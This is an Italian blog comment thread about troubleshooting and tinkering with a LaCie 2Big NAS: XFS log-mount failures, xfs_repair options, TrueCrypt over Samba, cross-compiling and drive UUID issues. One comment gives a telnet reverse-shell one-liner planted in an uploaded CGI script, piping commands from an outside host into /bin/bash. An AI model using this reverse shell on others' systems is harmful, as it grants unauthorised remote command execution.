    Apr 16 17:30:12 (none) user.warn kernel: [] (vfs_kern_mount+0x0/0x94) from [] (do_kern_mount+0x3c/0xd8)
    Apr 16 17:30:12 (none) user.warn kernel: r8:bf09327c r7:c647c000 r6:00000000 r5:c77b5000 r4:00008000
    Apr 16 17:30:12 (none) user.warn kernel: [] (do_kern_mount+0x0/0xd8) from [] (do_mount+0x57c/0x5cc)
    Apr 16 17:30:12 (none) user.warn kernel: r9:00000000 r8:00008000 r7:c77b5000 r6:00000000 r5:00000000
    Apr 16 17:30:12 (none) user.warn kernel: r4:00000000
    Apr 16 17:30:12 (none) user.warn kernel: [] (do_mount+0x0/0x5cc) from [] (sys_mount+0x8c/0xd4)
    Apr 16 17:30:12 (none) user.warn kernel: [] (sys_mount+0x0/0xd4) from [] (ret_fast_syscall+0x0/0x2c)
    Apr 16 17:30:12 (none) user.warn kernel: r7:00000015 r6:0008eb1f r5:0008eb16 r4:00000000
    Apr 16 17:30:12 (none) user.warn kernel: XFS: log mount/recovery failed: error 117
    Apr 16 17:30:12 (none) user.warn kernel: XFS: log mount failed
    Apr 16 17:30:12 (none) local1.notice mountuserfs: mount: mounting /dev/md4 on /home failed: Structure needs cleaning
    Apr 16 17:30:12 (none) local1.notice mountuserfs: WARNING, failed to mount /home
    Apr 16 17:30:12 (none) local1.notice InitNG: Service mountuserfs is up.
    Apr 16 17:30:13 (none) local1.notice InitNG: Service mdadm is up.

33. La risposta se la mia guida ti può essere utile.. si.
    Spero intanto che te la cavi un minimo con linux, questo ti potrebbe essere d’aiuto.
    Hai due modi per lavorare sugli hard disk, dal nas stesso o altrimenti da un pc fisso con su linux (magari ubuntu che è semplice) e mdadm installato.
    Nell’ipotesi che non conosci linux e non vuoi togliere gli hd dal nas:
    Dovresti seguire la guida passo passo fino al punto “aggiungere telnet al nas”. (Spero che tu conosca telnet)
    Per accedere al sistema operativo del nas ti basta un accesso telnet, il resto della guida è superfluo.
    Sul nas è già installata l’utility xfs_recovery.
    Il comando che devi lanciare è: xfs_repair /dev/md4
    con il comando: xfs_repair -L /dev/md4 cancellerai i log del filesystem (molto invasivo, suggerisco cautela)
    se preferisci vedere un po di informazioni in più: xfs_repair -v -L /dev/md4
    Il comando xfs_repair -n /dev/md4 controlla il filesystem senza modificare nulla.

    Non sarebbe male se quando si chiede aiuto si indicasse anche che tipo di raid si sta usando nel nas,
    e il proprio livello di competenza..
    Comunque vada non formattare la partizione con i dati personali, anche se illeggibile ok?
    Esistono programmi sotto windows per recuperare filesystem xfs, che funzionano estremamente bene.
    Fammi sapere come va, eventualmente si prova un altra strada (con pc e windows).
    In bocca a lupo. 🙂

34. Ciao il RAID è un RAID 0 (da qui la grande paura di perdere i dati)
    La mia conoscenza di linux è buona ma non ho mai affrontato RAID software o raid HW.

    Dici che se lancio xfs_repair -L /dev/md4 non inguiai niente? Se va male qualcosa pero dei dati che devo recuperare assolutamente.

35. L’utility xfs_repair dovrebbe fare al caso tuo, inoltre è distribuita insieme a xfs.
    In passato ho fatto l’errore di cancellare l’intera partizione dati del mio nas.
    L’utility xfs_repair non serve ad un tubo in queste circostanza perché ripara un filesystem danneggiato, non ne recupera i dati.
    Sotto linux non sono riuscito a trovare nessun tool che mi permettesse di recuperare i dati
    Mentre sotto windows ho trovato questa utility qui: Raise Data Recovery for XFS (http://www.ufsexplorer.com/rdr_xfs.php)
    La cosa noiosa: è a pagamento e per farla funzionare con il raid ci devi aggiungere un plugin (anch’esso a pagamento)
    Sempre della stessa società e distribuito un altro software: UFS Explorer Standard Recovery (anche qui da aggiungere il plugin del raid)
    Il mio nas è in raid 1 quindo non ho avuto bisogno del plugin raid e il programma mi ha recuperato il 98% dei dati, impiegandoci circa un intera giornata.
    Inoltre hai bisogno di un hd di capacità uguale ai dati che avevi storato nel nas, dato che entrambi i software usano la partizione del nas in sola lettura (ovviamente).
    Ha c’è anche un altro comando: xfs_check
    Una guida (il primo link restituito da google) che ho trovato su xfs e i suoi comandi è: http://linux.die.net/man/8/xfs_check
    (Equivalente a fare man xfs)
    Valuta tu, i programmi che ti ho descritto sono cari, io un tentativo con le utility del nas lo farei.
    Senza contare che comunque devi estrarre gli hd del nas e montarli su un pc fisso (non ho idea se per te questo è un problema).

    Prova prima con questo comando:
    xfs_repair /dev/md4
    e vedi un po’, senza -L è decisamente meno invasivo.
    Mentre il comando:
    xfs_repair -n /dev/md4
    controlla ma non modifica nulla.

36. Grazie ancora, si proverò a lanciare xfs_check e poi xfs_repair direttamente dal 2big e vedo che succede, spero tanto mi sistemi il FS 🙂 Poi ti faccio sapere. Prima però farò una immagine dei 2 HD con clonezilla. Non è un problema estrarli devo solo trovare un pc con 4 sata 🙂
    Grazie anche per gli altri suggerimenti per il recupero dati ma spero di non giungere a tanto.

37. Porca boia non riesco a mettere in piedi alcun sistema di criptatura sensato:
    se uso truecrypt mettendo il file sul Lacie e ci accedo via samba da un pc con truecrypt installato va per un po’ e poi mi crasha il nas perche’ samba va in palla e l’uptime supera i 30 finche’ non muore il nas.

    Cercando di fare l’operazione di cifratura direttamente sul nas vedo che non esiste il device /dev/loop0 su cui fare il loop per creare un device su file e poi cifrarlo. Creando lo special file con mknod apparentemente funziona, ma poi losetup mi dice che non esiste il device file (quindi probabilmente non c’e’ il modulo del kernel che supporta i loop, e non saprei dove prenderlo).

    Idee?

    Dirac

38. No sorry.. really no..
    Se avessi avuto un po di fortuna con il cross-compiling…
    Ho provato più volte a compilare il kernel distribuito dalla lacie (http://www.lacie.com/download/drivers/NAS_Sys_2.2.x-GPL/lacie_2.2.x_GPL.tar) senza alcun risultato.
    Probabilmente per ignoranza mia, ma tra le mille opzioni del kernel per impostare la compilazione compatibile con l’architettura del nas, non sono riuscito mai a capire qual’era quella corretta.
    Se si fa file su un file del nas questo è il risultato:
    ELF 32-bit LSB executable, ARM, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.14, stripped
    Anche quando sono riuscito a compilare un file con la stessa dicitura non sono, di fatto, mai riuscito a farlo eseguire dal nas.
    Se fossi riuscito nel mio intento in questo momento avrei il nas con il servizio nfs server attivo e in più lo avrei convertito in uno stereo con una chiavetta audio usb. bha!
    I moduli del kernel presenti nel nas sono contati, già dobbiamo ringraziare che c’era il modulo per la stampa su usb!
    Ovviamente bisogna sperare che il kernel sia compilato per supportare questi moduli.
    Asp.. azz. ho fatto casino con il nas. Torno tra un attimo!
    Ok problema risolto evviva gli snapshot! fiuuu…
    Più che altro… stavo pensando ad un workaround, tipo pennina esterna usb con filesystem criptato…
    Che ne pensi? Dato che non è possibile rimpicciolire un filesystem xfs.
    Anzi è bene non toccare il filesystem xfs del nas (vedi il primo commento di george a questo post)
    Ps. oggi sono parecchio fuso ho solo 4 ore di sonno e sto programmando da questa notte, non penso di essere molto attendibile.. 😛

39. Sul toccare il filesystem xfs non c’e’ dubbio, anche perche’ ho visto che sto nas tende a rimettere tutti i files a posto; ad esempio ho modificato l’smb.conf e al reboot successivo e’ tutto tornato come prima (come il passwd per capirci). Quindi chissa’ cosa farebbe con i files di configurazione vari che magari interagiscono col filesystem.
    A proposito sei riuscito a fare reboot da console? Shutdown -h non esiste, esiste reboot che pero’ non funziona sempre.
    Inoltre ho visto che c’e’ di mezzo sqlite che pare estragga alcune info di configurazione dai files .db.

    Per quanto riguarda la usb non mi serve, io vorrei fare un fs cifrato da 2-3 Terabytes, con la protezione di un raid5. Per fare cio’ ho creato un file truecrypt via smb, grande 3Tbytes. 3-4 giorni per crearlo. Poi apro il file .tcr via samba (ftp e http non sono supportati) e infilo i miei files nel tcr. Va per un centinaio di Gbytes, poi esplodono il numero di smbd sul nas e l’uptime.

    Non ho ancora capito se e’ un problema di truecrypt oppure dell’hardware/software del nas. Il dmesg non rivela nulla, sto provando a creare dei giganteschi dd if=/dev/zero of=lacie per vedere se ci fosse un problema hw sul nas. Cheppalle pero’…

    Mi sa che bisognera’ imparare a fare il cross-compiling, ma quando? Ci vorrebbe anche del tempo…

40. Ciao di nuovo 🙂

    Sul toccare il filesystem xfs non c’e’ dubbio, anche perché ho visto che sto nas tende a rimettere tutti i files a posto.

    Non è questo il problema. L’unico modo restringere una partizione xfs, che io sappia, è cancellarla e rifarla più piccola.
    Questo ne cambierebbe l’uuid e il nas non la monterebbe più (vedi il commento di George).
    Personalmente non toccherei le partizioni del nas neanche dietro pagamento.

    ad esempio ho modificato l’smb.conf e al reboot successivo è tutto tornato come prima

    Nulla di nuovo… Infatti avevo modificato il mio servizio “personal” per migliorare il rapporto tra cups e samba.
    Scoprendo solo dopo che samba sul nas non è stato compilato con il supporto al cups (ho fatto del lavoro inutile).

    Infatti se si fa:
    # ldd /usr/sbin/smbd
libldap-2.3.so.0 => /usr/lib/libldap-2.3.so.0 (0x40026000)
liblber-2.3.so.0 => /usr/lib/liblber-2.3.so.0 (0x4005b000)
libgssapi_krb5.so.2 => /usr/lib/libgssapi_krb5.so.2 (0x4006d000)
libkrb5.so.3 => /usr/lib/libkrb5.so.3 (0x40097000)
libk5crypto.so.3 => /usr/lib/libk5crypto.so.3 (0x40101000)
libcom_err.so.3 => /usr/lib/libcom_err.so.3 (0x4012d000)
libresolv.so.2 => /lib/libresolv.so.2 (0x40139000)
libdl.so.2 => /lib/libdl.so.2 (0x40153000)
libcrypt.so.1 => /lib/libcrypt.so.1 (0x4015e000)
libpam.so.0 => /lib/libpam.so.0 (0x40193000)
libacl.so.1 => /usr/lib/libacl.so.1 (0x401a5000)
libattr.so.1 => /usr/lib/libattr.so.1 (0x401b4000)
libnsl.so.1 => /lib/libnsl.so.1 (0x401bf000)
libiconv.so.2 => /usr/lib/libiconv.so.2 (0x401dc000)
libtalloc.so.1 => /usr/lib/libtalloc.so.1 (0x402c1000)
libtdb.so.1 => /usr/lib/libtdb.so.1 (0x402ce000)
libwbclient.so.0 => /usr/lib/libwbclient.so.0 (0x402e3000)
libz.so.1 => /usr/lib/libz.so.1 (0x402f5000)
libgcc_s.so.1 => /usr/lib/libgcc_s.so.1 (0x4030d000)
libc.so.6 => /lib/libc.so.6 (0x40321000)
libssl.so.0.9.8 => /usr/lib/libssl.so.0.9.8 (0x40455000)
libcrypto.so.0.9.8 => /usr/lib/libcrypto.so.0.9.8 (0x40499000)
libkrb5support.so.0 => /usr/lib/libkrb5support.so.0 (0x405d9000)
/lib/ld-linux.so.3 (0x40000000)

    Manca la riga: libcups.so.2 => /usr/lib/libcups.so.2 (0x000... quindi tanti saluti al supporto cups per samba.
    (L’utility ldd non è presente sul nas, l’ho installata ieri e per poco, per una mia disattenzione, non mi fregavo il nas: mai sovrascrivere librerie già presenti nel nas!)
    Con il nuovo firmware che hanno rilasciato (ver 2.2.6) hanno aggiornato, tra le altre cose, samba.
    Tuttavia i risultato che vedi su è stato eseguito sull’ultima versione rilasciata. 🙁

    A proposito sei riuscito a fare reboot da console? Shutdown -h non esiste, esiste reboot che pero’ non funziona sempre.

    Anche qui nulla di nuovo, purtroppo.
    Ti consiglio: # ngc -h per avere un idea di cosa fa ngc.
    In particolare:
    ngc -6 esegue il reboot del sistema
    ngc -0 arresta il sistema
    Tuttavia ngc ha dei problemi, che sono quelli che ha riscontrato tu per l’appunto.
    Penso che dipendano dall’hardware, se provi ad arrestare il sistema con il pulsante del nas messo su on questo, di fatto, non si arresta.
    Esattamente come dall’interfaccia web. Inoltre quando esegui il comando reboot altro non fai che eseguire ngc -6.
    Non ho trovato soluzioni a questo comportamento anomalo. Per adesso continuo ad eseguire il reboot del nas tramite interfaccia web. 🙁
    Ad ogni modo l’hang up del nas in fase di reboot mi è successo di rado, ci sono voluti almeno due / tre riavvii conseguitivi perché si verificasse.

    Inoltre ho visto che c’é di mezzo sqlite che pare estragga alcune info di configurazione dai files .db.

    Se ti riferisci a backup.db.. allora:
    # sqlite3 /etc/backup.db apri il file
    select * from sqlite_master; vedi quante tabelle sono presenti nel database
    select * from backup; vedi il contenuto della tabella backup del database
    .quit chiudi sqlite.
    Il file /etc/backup.db si occupa di memorizzare i backup che il nas effettua. (Quelli configurabili dall’interfaccia web per intenderci)
    Non ci sono informazioni sulla configurazione del nas.
    E’ molto probabile che tutte le informazioni sulla configurazione del nas siano memorizzate nella eprom.

    Poi apro il file .tcr via samba (ftp e http non sono supportati) e infilo i miei files nel tcr.

    Magari dico una cazzata ma hai provato con ssh? Linux ti permette di montare un filesystem remoto tramite ssh.
    L’ssh installato sul nas lo supporta egregiamente, ovviamente è lento perché il nas deve criptare e decriptare tutti i dati.

    Va per un centinaio di Gbytes, poi esplodono il numero di smbd sul nas e l’uptime

    Qui non so che dirti, probabilmente il nas non riesce semplicemente a gestire quella mole di dati e samba crasha.
    Tieni conto che il nas ha solo 128mb di swap e 128mb di ram (nei nuovi modelli 64 nei vecchi) se ram e swap sono pieni il nas muore.
    (Era quello che accadeva in fase di installazione del firmware 2.2.5 ❗ 😛 )
    Usa free per vedere queste informazioni.

    Mi sa che bisognerà imparare a fare il cross-compiling, ma quando? Ci vorrebbe anche del tempo…

    Io al momento ne sono a corto inoltre mi ha anche fatto passare la voglia per quanto tempo ci ho sbattuto.
    Preferirei debaggare un segfault in C : mi stresserebbe di meno!

    Ps. si vede che ho dormito? 😛

41. Ciao grazie per le informazioni,
    quella di reboot = ngc -6 e quella di sqlite3 sono particolarmente utili.

    sshfs e’ spaventosamente lento, vado a 1Mbytes/sec usando rsync su un fs sshfs. Quindi inutilizzabile. Samba va circa a 10Mbytes, che e’ lento ma non lentissimo, peccato che vada in crash. Ora sto provando un’altra cosa: sto dumpando la partizione truecrypt su un file con dd (in realta’ lo spezzo in 4-5 files), li trasferisco con ftp sul nas, ricorstruisco il file truecrypt e ci accedo con samba. A quel punto potrebbe non morire piu’ perche’ mi ritroverei a fare solo aggiornamenti sul fs e non a copiare Giga e Giga di roba, cosi’ forse samba ce la fa.

    Ci vorranno un po’ di giorni causa impegni, ma poi se riesco te lo dico.

    Se invece i files di config sono sulla eeprom allora da qualche parte ci sara’ l’utility per leggerci da sta eeprom…

    Io invece oggi sono mezzo rincoglionito dal sonno…

42. Allora…
    piccolo workaround se per caso non dovessimo piu’ riuscire ad usare utelnetd;

    chiamando MIOHOST un server linux mio su cui ho installato netcat:
    lancio su MIOHOST un terminale su cui lancio
    nc -l -p 3000

    su un altro terminale sempre su MIOHOST lancio
    nc -l -p 4000

    nello script cgi che viene uploadato sul nas al posto delle due righe finali si mette:
    echo lancio i telnet in cascata…
    eval ‘sleep 3000 | telnet xx.yy.zz.kk 3000 | grep -v \( –line-buffered | /bin/bash | telnet xx.yy.zz.kk 4000′

    dove xx.yy.zz.kk e’ l’indirizzo IP di MIOHOST.

    A questo punto si fa eseguire il cgi-bin tramite browser e si danno i comandi nella shell con il 3000, si legge l’output nella shell con la porta 4000 in ascolto.

    Tecnica di reverse shell con telnet

43. Ciao, ho risolto! Prima di tutto ho fatto il backup dei 2 dischi su 2 altri dischi identici solo per cautela e finalmente dopo aver messo questi 2 ultimi su un pc con ubuntu mi ha riparato il filesystem con xfs_repair -L /dev/md4 senza la L non ne voleva sapere.
    Grazie mille per l’aiuto!

    Una stranezza: ho messo i 2 HD clonati e con xfs riparato sul 2big che però resta sempre con la luce blu frontale lampeggiante, può dargli fastidio che abbia messo gli altri HD? Sono identici agli originali come contenuto e partizioni.
    Tralaltro non posso amministrarlo perché resta appunto lampeggiante e non prende l’indirizzo in DHCP.

44. Intanto scusate se ho impiegato tempo a rispondere ma sono rimasto alcuni giorni senza adsl…
    @restore

    può dargli fastidio che abbia messo gli altri HD? Sono identici agli originali come contenuto e partizioni.

    Si è risaputo che gli hd, anche se con partizioni e contenuto uguale, non funzionano. (vedi discussioni su forum general nas-central)
    La soluzione a questo problema è fornita da George, nel primo commento di questo post. ❗
    Il mount delle partizioni raid viene fatto tramite uuid che presumibilmente é memorizzato nella eeprom.
    Quindi quando fai un’immagine di un hd di fatto l’uuid comunque è diverso e il nas non parte.
    Ti consiglio di guardare il primo commento; George spiega in modo efficace (comandi compresi) come risolvere il problema.

    …senza la L non ne voleva sapere…

    Il tuo errore “log mount/recovery failed: error 117” si suggeriva in molti forum affidabili il comando -L per risolverlo perché il codice 117 indica appunto un problema con il log.
    Ovviamente. data la situazione, è chiaro che la prudenza non è mai troppa.

    @dirac
    Grazie per il tuo commento sullo reverse shell con telnet, conoscere nuove tecniche è sempre di aiuto.

    Ps. Auguri per il primo maggio. 🙂

45. Grazie Steppen 🙂

46. Rieccomi ho provato a vedere l’UUID di sda2 (hd vecchi e nuovi) e quello dell’EEPROM beh tutti coincidono e non ho fatto niente in tal senso se non fare delle copie settore per settore dei vecchi HD su quelli nuovi, evidentemente è stato clonato anche l’UUID, resta quindi un mistero perchè con gli HD vecchi che hanno ancora il filesystem rovinato il NAS parta mentre con i nuovi no anche se l’UUID è identico. Che la riparazione del filesystema dia fastidio al NAS? Mi par strano.
    Vorrei un chiarimento: sopra George si stupisce che Lacie abbia fatto in modo che solo gli HD con lo stesso UUID dell’EPROM il NAS parta, ma se io mettessi dentro 2 HD mai formattati prima e senza partizioni? Non dovrei poter creare il RAID e usare gli HD nuovi? Mi pare strano che in caso di HD guasto spedito a Lacie questa rimandi un HD nuovo con già sopra le partizioni e quindi l’UUID giusto, è così? Altrimenti seguendo il ragionamento anche quest’ultimo HD non farebbe partire il NAS.

    Sto pensando di fare un bel fdisk sui 2 hd nuovi per cancellare tutto e vedere come si comporta il NAS, che ne dite?

47. Mi rispondo da solo:

    Lacie ha messo il sistema operartivo sui dischi…

48. Scusami se ti rispondo solo ora.

    Lacie ha messo il sistema operartivo sui dischi…

    Si, infatti davo per scontato che lo sapessi, il sistema operativo è troppo grosso per entrare in memoria nvram (come accade per la fonera).
    Infatti gli hd hanno numerose partizioni:

    /dev/md1 167.0M 111.3M 47.1M 70% /oldroot/var/original
    /dev/md2 648.4M 20.2M 595.3M 3% /oldroot/snapshots
    ….

    md1 per il sistema operativo originale, nel mio caso la ver. 2.2.3
    md2 per gli aggiornamenti del sistema operativo e gli snapshot.
    quindi per avviare il nas non si deve fare la copia della sola partizione dai dati personali ma di tutto l’hd.
    Scusa nuovamente se ti rispondo con questo ritardo ma ero in trasferta a casa.

49. Ciao, non ti preoccupare se sei impegnato è giusto così.
    Ho formattato i 2 HD adesso rifarò le partizioni seguendo il topic su forum.nas-central.org, comunque Lacie ha veramente reso la vita dura nel ripristino di sto NAS

50. salve ho un Lacie 2Big Network con la scheda madre andata!! era settato in Raid0 ho fatto vari test e non sono riuscito a vedere i dati, ho montato ubuntu su di una macchina e riesco avedere i 2 dischi con le varie partizioni ma non riesco a montare il raid0 per cercare di recuperare i dati, sapete darmi inicazioni in merito? devo mandarlo ad un centro recupero dati?
    grazie

I commenti sono chiusi.